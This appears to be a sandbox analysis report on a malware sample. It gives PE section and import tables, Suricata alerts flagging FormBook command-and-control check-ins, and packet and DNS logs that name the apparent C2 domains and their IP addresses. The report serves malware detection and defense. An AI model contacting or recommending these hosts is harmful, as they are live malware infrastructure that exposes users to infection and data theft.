                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0xd40000xde7800xde8006653ed7a27635726cb185f3993cb17a0False0.7047785726825843data7.140139325357158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x1b30000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xd45d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                              RT_ICON0xd47000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                              RT_ICON0xd48280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                              RT_ICON0xd49500x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishGreat Britain0.34382119714767584
                                                                                                              RT_ICON0x1169780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.4301727197444694
                                                                                                              RT_ICON0x1271a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.5156874080302711
                                                                                                              RT_ICON0x1306480x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.5365526802218115
                                                                                                              RT_ICON0x135ad00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.5247401983939537
                                                                                                              RT_ICON0x139cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5785269709543569
                                                                                                              RT_ICON0x13c2a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6036585365853658
                                                                                                              RT_ICON0x13d3480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.6827868852459016
                                                                                                              RT_ICON0x13dcd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7535460992907801
                                                                                                              RT_MENU0x13e1380x50dataEnglishGreat Britain0.9
                                                                                                              RT_STRING0x13e1880x594dataEnglishGreat Britain0.3333333333333333
                                                                                                              RT_STRING0x13e71c0x68adataEnglishGreat Britain0.2735961768219833
                                                                                                              RT_STRING0x13eda80x490dataEnglishGreat Britain0.3715753424657534
                                                                                                              RT_STRING0x13f2380x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                              RT_STRING0x13f8340x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                              RT_STRING0x13fe900x466dataEnglishGreat Britain0.3605683836589698
                                                                                                              RT_STRING0x1402f80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                              RT_RCDATA0x1404500x71da4data1.0003237980872326
                                                                                                              RT_GROUP_ICON0x1b21f40x84dataEnglishGreat Britain0.7196969696969697
                                                                                                              RT_GROUP_ICON0x1b22780x14dataEnglishGreat Britain1.25
                                                                                                              RT_GROUP_ICON0x1b228c0x14dataEnglishGreat Britain1.15
                                                                                                              RT_GROUP_ICON0x1b22a00x14dataEnglishGreat Britain1.25
                                                                                                              RT_VERSION0x1b22b40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                              RT_MANIFEST0x1b23900x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                              UxTheme.dllIsThemeActive
                                                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                              GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                              SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                              OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishGreat Britain

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-13T13:06:02.674559+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649738164.92.166.7580TCP
                                                                                                              2025-01-13T13:06:02.674559+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649738164.92.166.7580TCP
                                                                                                              2025-01-13T13:06:02.674559+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649738164.92.166.7580TCP
                                                                                                              2025-01-13T13:06:22.815300+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649751172.104.236.21580TCP
                                                                                                              2025-01-13T13:06:22.815300+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649751172.104.236.21580TCP
                                                                                                              2025-01-13T13:06:22.815300+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649751172.104.236.21580TCP
                                                                                                              2025-01-13T13:06:42.498046+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649752104.21.40.19680TCP
                                                                                                              2025-01-13T13:06:42.498046+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649752104.21.40.19680TCP
                                                                                                              2025-01-13T13:06:42.498046+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649752104.21.40.19680TCP
                                                                                                              2025-01-13T13:07:24.284359+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649753217.21.91.2480TCP
                                                                                                              2025-01-13T13:07:24.284359+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649753217.21.91.2480TCP
                                                                                                              2025-01-13T13:07:24.284359+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649753217.21.91.2480TCP
                                                                                                              2025-01-13T13:08:05.002852+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649755104.21.80.15680TCP
                                                                                                              2025-01-13T13:08:05.002852+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649755104.21.80.15680TCP
                                                                                                              2025-01-13T13:08:05.002852+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649755104.21.80.15680TCP
                                                                                                              2025-01-13T13:08:46.057105+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649756104.18.188.22380TCP
                                                                                                              2025-01-13T13:08:46.057105+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649756104.18.188.22380TCP
                                                                                                              2025-01-13T13:08:46.057105+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.649756104.18.188.22380TCP
                                                                                                              2025-01-13T13:09:28.139155+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64975723.225.71.16680TCP
                                                                                                              2025-01-13T13:09:28.139155+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64975723.225.71.16680TCP
                                                                                                              2025-01-13T13:09:28.139155+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64975723.225.71.16680TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 13, 2025 13:06:02.162806034 CET4973880192.168.2.6164.92.166.75
                                                                                                              Jan 13, 2025 13:06:02.168957949 CET8049738164.92.166.75192.168.2.6
                                                                                                              Jan 13, 2025 13:06:02.169055939 CET4973880192.168.2.6164.92.166.75
                                                                                                              Jan 13, 2025 13:06:02.169464111 CET4973880192.168.2.6164.92.166.75
                                                                                                              Jan 13, 2025 13:06:02.175730944 CET8049738164.92.166.75192.168.2.6
                                                                                                              Jan 13, 2025 13:06:02.669368029 CET4973880192.168.2.6164.92.166.75
                                                                                                              Jan 13, 2025 13:06:02.674501896 CET8049738164.92.166.75192.168.2.6
                                                                                                              Jan 13, 2025 13:06:02.674559116 CET4973880192.168.2.6164.92.166.75
                                                                                                              Jan 13, 2025 13:06:22.297905922 CET4975180192.168.2.6172.104.236.215
                                                                                                              Jan 13, 2025 13:06:22.302835941 CET8049751172.104.236.215192.168.2.6
                                                                                                              Jan 13, 2025 13:06:22.302926064 CET4975180192.168.2.6172.104.236.215
                                                                                                              Jan 13, 2025 13:06:22.302968979 CET4975180192.168.2.6172.104.236.215
                                                                                                              Jan 13, 2025 13:06:22.307801008 CET8049751172.104.236.215192.168.2.6
                                                                                                              Jan 13, 2025 13:06:22.809895039 CET4975180192.168.2.6172.104.236.215
                                                                                                              Jan 13, 2025 13:06:22.815217972 CET8049751172.104.236.215192.168.2.6
                                                                                                              Jan 13, 2025 13:06:22.815299988 CET4975180192.168.2.6172.104.236.215
                                                                                                              Jan 13, 2025 13:06:42.012725115 CET4975280192.168.2.6104.21.40.196
                                                                                                              Jan 13, 2025 13:06:42.017467976 CET8049752104.21.40.196192.168.2.6
                                                                                                              Jan 13, 2025 13:06:42.017532110 CET4975280192.168.2.6104.21.40.196
                                                                                                              Jan 13, 2025 13:06:42.017618895 CET4975280192.168.2.6104.21.40.196
                                                                                                              Jan 13, 2025 13:06:42.022413015 CET8049752104.21.40.196192.168.2.6
                                                                                                              Jan 13, 2025 13:06:42.497585058 CET8049752104.21.40.196192.168.2.6
                                                                                                              Jan 13, 2025 13:06:42.497725964 CET4975280192.168.2.6104.21.40.196
                                                                                                              Jan 13, 2025 13:06:42.498001099 CET8049752104.21.40.196192.168.2.6
                                                                                                              Jan 13, 2025 13:06:42.498045921 CET4975280192.168.2.6104.21.40.196
                                                                                                              Jan 13, 2025 13:06:42.502485037 CET8049752104.21.40.196192.168.2.6
                                                                                                              Jan 13, 2025 13:07:23.610233068 CET4975380192.168.2.6217.21.91.24
                                                                                                              Jan 13, 2025 13:07:23.615056992 CET8049753217.21.91.24192.168.2.6
                                                                                                              Jan 13, 2025 13:07:23.615294933 CET4975380192.168.2.6217.21.91.24
                                                                                                              Jan 13, 2025 13:07:23.615294933 CET4975380192.168.2.6217.21.91.24
                                                                                                              Jan 13, 2025 13:07:23.620106936 CET8049753217.21.91.24192.168.2.6
                                                                                                              Jan 13, 2025 13:07:24.107283115 CET4975380192.168.2.6217.21.91.24
                                                                                                              Jan 13, 2025 13:07:24.155144930 CET8049753217.21.91.24192.168.2.6
                                                                                                              Jan 13, 2025 13:07:24.284296036 CET8049753217.21.91.24192.168.2.6
                                                                                                              Jan 13, 2025 13:07:24.284358978 CET4975380192.168.2.6217.21.91.24
                                                                                                              Jan 13, 2025 13:08:04.498424053 CET4975580192.168.2.6104.21.80.156
                                                                                                              Jan 13, 2025 13:08:04.503287077 CET8049755104.21.80.156192.168.2.6
                                                                                                              Jan 13, 2025 13:08:04.503353119 CET4975580192.168.2.6104.21.80.156
                                                                                                              Jan 13, 2025 13:08:04.503456116 CET4975580192.168.2.6104.21.80.156
                                                                                                              Jan 13, 2025 13:08:04.508271933 CET8049755104.21.80.156192.168.2.6
                                                                                                              Jan 13, 2025 13:08:04.997766018 CET4975580192.168.2.6104.21.80.156
                                                                                                              Jan 13, 2025 13:08:05.002790928 CET8049755104.21.80.156192.168.2.6
                                                                                                              Jan 13, 2025 13:08:05.002851963 CET4975580192.168.2.6104.21.80.156

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 13, 2025 13:06:02.045589924 CET5740753192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:06:02.161725998 CET53574071.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:06:22.044751883 CET5189653192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:06:22.297101021 CET53518961.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:06:41.998478889 CET5176253192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:06:42.011888027 CET53517621.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:07:02.747208118 CET5388253192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:07:02.762029886 CET53538821.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:07:23.561095953 CET5798553192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:07:23.609267950 CET53579851.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:07:44.032860041 CET6525653192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:07:44.041654110 CET53652561.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:08:04.482732058 CET5307153192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:08:04.497265100 CET53530711.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:08:24.920563936 CET6077853192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:08:24.930558920 CET53607781.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:08:45.326337099 CET5000753192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:08:45.591274023 CET53500071.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:09:26.270142078 CET5770853192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:09:27.263577938 CET5770853192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:09:27.611310005 CET53577081.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:09:27.611670017 CET53577081.1.1.1192.168.2.6
                                                                                                              Jan 13, 2025 13:09:48.529829025 CET5663953192.168.2.61.1.1.1
                                                                                                              Jan 13, 2025 13:09:48.909723043 CET53566391.1.1.1192.168.2.6

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 13, 2025 13:06:02.045589924 CET192.168.2.61.1.1.10x33d2Standard query (0)www.simo1simo001.clickA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:06:22.044751883 CET192.168.2.61.1.1.10xf947Standard query (0)www.ilsgroup.netA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:06:41.998478889 CET192.168.2.61.1.1.10x4c92Standard query (0)www.7b5846.onlineA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:07:02.747208118 CET192.168.2.61.1.1.10xfa5aStandard query (0)www.91uvq.proA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:07:23.561095953 CET192.168.2.61.1.1.10xcdebStandard query (0)www.maheshg.xyzA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:07:44.032860041 CET192.168.2.61.1.1.10xf464Standard query (0)www.hair-transplantation-65829.bondA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:04.482732058 CET192.168.2.61.1.1.10xf942Standard query (0)www.gequiltdesins.shopA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:24.920563936 CET192.168.2.61.1.1.10x8e5Standard query (0)www.backstretch.storeA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:45.326337099 CET192.168.2.61.1.1.10x5b52Standard query (0)www.health-insurance-cake.worldA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:26.270142078 CET192.168.2.61.1.1.10xc897Standard query (0)www.86339.xyzA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:27.263577938 CET192.168.2.61.1.1.10xc897Standard query (0)www.86339.xyzA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:48.529829025 CET192.168.2.61.1.1.10x948Standard query (0)www.d66dr114gl.bondA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 13, 2025 13:06:02.161725998 CET1.1.1.1192.168.2.60x33d2No error (0)www.simo1simo001.click164.92.166.75A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:06:22.297101021 CET1.1.1.1192.168.2.60xf947No error (0)www.ilsgroup.netilsgroup.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:06:22.297101021 CET1.1.1.1192.168.2.60xf947No error (0)ilsgroup.net172.104.236.215A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:06:42.011888027 CET1.1.1.1192.168.2.60x4c92No error (0)www.7b5846.online104.21.40.196A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:06:42.011888027 CET1.1.1.1192.168.2.60x4c92No error (0)www.7b5846.online172.67.188.70A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:07:02.762029886 CET1.1.1.1192.168.2.60xfa5aName error (3)www.91uvq.prononenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:07:23.609267950 CET1.1.1.1192.168.2.60xcdebNo error (0)www.maheshg.xyzmaheshg.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:07:23.609267950 CET1.1.1.1192.168.2.60xcdebNo error (0)maheshg.xyz217.21.91.24A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:07:44.041654110 CET1.1.1.1192.168.2.60xf464Name error (3)www.hair-transplantation-65829.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:04.497265100 CET1.1.1.1192.168.2.60xf942No error (0)www.gequiltdesins.shop104.21.80.156A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:04.497265100 CET1.1.1.1192.168.2.60xf942No error (0)www.gequiltdesins.shop172.67.151.88A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:24.930558920 CET1.1.1.1192.168.2.60x8e5Name error (3)www.backstretch.storenonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:45.591274023 CET1.1.1.1192.168.2.60x5b52No error (0)www.health-insurance-cake.worldssl1.prod.systemdragon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:45.591274023 CET1.1.1.1192.168.2.60x5b52No error (0)ssl1.prod.systemdragon.com104.18.188.223A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:08:45.591274023 CET1.1.1.1192.168.2.60x5b52No error (0)ssl1.prod.systemdragon.com104.18.187.223A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:27.611310005 CET1.1.1.1192.168.2.60xc897No error (0)www.86339.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:27.611310005 CET1.1.1.1192.168.2.60xc897No error (0)huayang.302.gn301.xyz23.225.71.166A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:27.611310005 CET1.1.1.1192.168.2.60xc897No error (0)huayang.302.gn301.xyz23.225.71.183A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 13:09:27.611670017 CET1.1.1.1192.168.2.60xc897No error (0)www.86339.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
